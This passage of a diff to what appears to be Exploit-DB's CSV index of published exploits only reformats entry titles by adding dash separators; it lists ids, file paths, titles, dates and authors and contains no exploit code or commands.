Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 /apply.cgi - Multiple Parameter XSS",2013-04-27,"Carl Benedict",hardware,remote,0 38502,platforms/php/webapps/38502.txt,"GetSimple CMS /admin/edit.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 @@ -34791,7 +34791,7 @@ id,file,description,date,author,platform,type,port 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38509,platforms/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 38510,platforms/php/webapps/38510.txt,"WordPress Securimage-WP Plugin - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 -38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 +38511,platforms/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 @@ -34818,7 +34818,7 @@ id,file,description,date,author,platform,type,port 38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF",2015-11-06,hyp3rlinx,jsp,webapps,0 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 -38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 +38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"php4dvd - 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross-Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x - Cross-Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 @@ -34829,10 +34829,10 @@ id,file,description,date,author,platform,type,port 38550,platforms/cgi/webapps/38550.txt,"QNAP VioStor NVR and QNAP NAS Remote Code Execution",2013-06-05,"Tim Herres",cgi,webapps,0 38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0 38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 -38554,platforms/android/remote/38554.py,"Samsung SecEmailUI Script Injection",2015-10-28,"Google Security Research",android,remote,0 +38554,platforms/android/remote/38554.py,"Samsung SecEmailUI - Script Injection",2015-10-28,"Google Security Research",android,remote,0 38555,platforms/android/dos/38555.txt,"Samsung - m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 -38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 +38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 38559,platforms/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation",2013-06-07,"Kees Cook",linux,local,0 38560,platforms/php/webapps/38560.txt,"Caucho Resin /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 @@ -34878,7 +34878,7 @@ id,file,description,date,author,platform,type,port 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow Exploit",2015-11-02,VIKRAMADITYA,windows,local,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 -38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD Multiple Local File Inclusion and Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 +38604,platforms/hardware/remote/38604.txt,"Mobile USB Drive HD Multiple Local File Inclusion and - Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,remote,0 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 @@ -34960,9 +34960,9 @@ id,file,description,date,author,platform,type,port 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"SilverStripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 -38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 +38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary Shell Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 -38694,platforms/windows/remote/38694.txt,"HTC Sync Manager Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 +38694,platforms/windows/remote/38694.txt,"HTC Sync Manager Multiple DLL Loading - Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 @@ -35009,7 +35009,7 @@ id,file,description,date,author,platform,type,port 38738,platforms/python/webapps/38738.txt,"Plone - 'in_portal.py' <= 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps,0 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps,0 -38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 +38741,platforms/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 @@ -35031,7 +35031,7 @@ id,file,description,date,author,platform,type,port 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0 38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross-Site Scripting",2015-11-19,Un_N0n,windows,webapps,0 38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 -38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 +38764,platforms/hardware/remote/38764.rb,"F5 iControl - iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF",2015-11-19,"High-Tech Bridge SA",php,webapps,80 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 @@ -35076,7 +35076,7 @@ id,file,description,date,author,platform,type,port 38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 -38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme Arbitrary Shell Upload",2013-10-23,DevilScreaM,php,webapps,0 +38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme - Arbitrary Shell Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component - 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 @@ -35120,11 +35120,11 @@ id,file,description,date,author,platform,type,port 38856,platforms/php/webapps/38856.txt,"WordPress Users Ultra Plugin 1.5.50 - Persistent XSS",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0 38858,platforms/windows/dos/38858.txt,"Malwarebytes Antivirus 2.2.0 - DoS PoC",2015-12-03,"Francis Provencher",windows,dos,0 -38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 -38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 +38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 +38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 -38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 +38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 @@ -35140,7 +35140,7 @@ id,file,description,date,author,platform,type,port 38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0 38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash PoC",2015-12-06,Un_N0n,windows,dos,0 -38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection",2013-12-14,R3d-D3V!L,asp,webapps,0 +38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injection",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga cgi/config.c process_cgivars Function Off-by-one Read Remote DoS",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 @@ -35177,11 +35177,11 @@ id,file,description,date,author,platform,type,port 38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"IE 11.0.9600.18097 COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 38917,platforms/osx/dos/38917.txt,"MacOS X 10.11 FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 -38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 +38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 -38920,platforms/php/webapps/38920.txt,"AFCommerce /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 -38921,platforms/php/webapps/38921.txt,"AFCommerce /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 -38922,platforms/php/webapps/38922.txt,"AFCommerce /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 +38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 @@ -35225,13 +35225,13 @@ id,file,description,date,author,platform,type,port 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0 -38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 +38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 38969,platforms/multiple/dos/38969.txt,"Adobe Flash - Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0 38970,platforms/multiple/dos/38970.txt,"Adobe Flash - Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Path Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 38972,platforms/windows/dos/38972.html,"Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",windows,dos,0 38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 -38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 +38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38977,platforms/php/webapps/38977.py,"Joomla 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0 @@ -35267,8 +35267,8 @@ id,file,description,date,author,platform,type,port 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request SEH Buffer Overflow",2015-12-16,ArminCyber,windows,remote,80 39010,platforms/linux/local/39010.c,"Gentoo Local Priv Escalation in QEMU",2015-12-17,zx2c4,linux,local,0 -39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39011,platforms/php/webapps/39011.txt,"UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39012,platforms/php/webapps/39012.txt,"UAEPD Shopping Script - /news.php id Parameter SQL Injection",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping Admin Password Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 @@ -35344,8 +35344,8 @@ id,file,description,date,author,platform,type,port 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - CSRF",2015-12-23,"Curesec Research Team",php,webapps,80 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 -39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 -39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 @@ -35359,7 +35359,7 @@ id,file,description,date,author,platform,type,port 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 -39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 +39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 39112,platforms/linux/local/39112.txt,"QNX Phgrafx File Enumeration Weakness",2014-03-10,cenobyte,linux,local,0 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 @@ -35390,7 +35390,7 @@ id,file,description,date,author,platform,type,port 39140,platforms/php/webapps/39140.txt,"Joomla! Inneradmission Component - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 -39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0 39144,platforms/windows/dos/39144.html,"Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 @@ -35439,9 +35439,9 @@ id,file,description,date,author,platform,type,port 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX Multiple SQL Injection",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 +39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/php/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0 -39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,Metasploit,hardware,webapps,0 +39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L - File Upload",2016-01-07,Metasploit,hardware,webapps,0 39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0 39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 @@ -35478,7 +35478,7 @@ id,file,description,date,author,platform,type,port 39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 -39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0 +39233,platforms/windows/dos/39233.txt,"Microsoft Office - COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0 39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Root Exploit",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 39236,platforms/multiple/webapps/39236.py,"Manage Engine Application Manager 12.5 - Arbitrary Command Execution",2016-01-14,"Bikramaditya Guha",multiple,webapps,0 @@ -35496,8 +35496,8 @@ id,file,description,date,author,platform,type,port 39251,platforms/php/webapps/39251.txt,"WordPress BookX Plugin - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0 39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 -39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 -39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 +39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 +39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39256,platforms/php/webapps/39256.txt,"Tera Charts - (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File 